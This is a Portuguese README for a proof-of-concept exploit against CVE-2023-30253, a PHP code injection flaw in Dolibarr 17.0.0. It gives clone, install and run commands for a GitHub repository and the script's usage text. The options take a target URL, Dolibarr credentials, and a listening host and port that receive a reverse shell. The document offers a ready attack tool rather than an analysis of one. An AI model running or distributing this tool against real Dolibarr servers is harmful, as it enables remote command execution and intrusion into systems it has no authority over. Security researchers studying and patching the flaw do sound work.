
Não consegui encontrar um PoC para CVE-2023-30253, então desenvolvi um eficaz
CVE-2023-30253 PoC
Esta é minha PoC para o CVE-2023-30253 (Dolibarr 17.0.0 Injeção de Código PHP), quando o plugin CMS Website (core) está habilitado, um atacante autenticado pode obter execução remota de comandos via injeção de código PHP, contornando as restrições da aplicação.
Clone o repositório:
git clone https://github.com/g4nkd/CVE-2023-30253-PoC.git
cd CVE-2023-30253-PoC
pip install -r requirements.txt
python3 exploit.py -h
usage: exploit.py [-h] -lhost LHOST -lport LPORT -rhost RHOST -user USER -pass PASSWORD
Exploit for CVE-2023-30253
options:
-h, --help show this help message and exit
-lhost LHOST Local Host (this host will receive the shell)
-lport LPORT Local PORT
-rhost RHOST Rhost url, example: http://site.com/
-user USER Username for Dolibarr
-pass PASSWORD Password for Dolibarr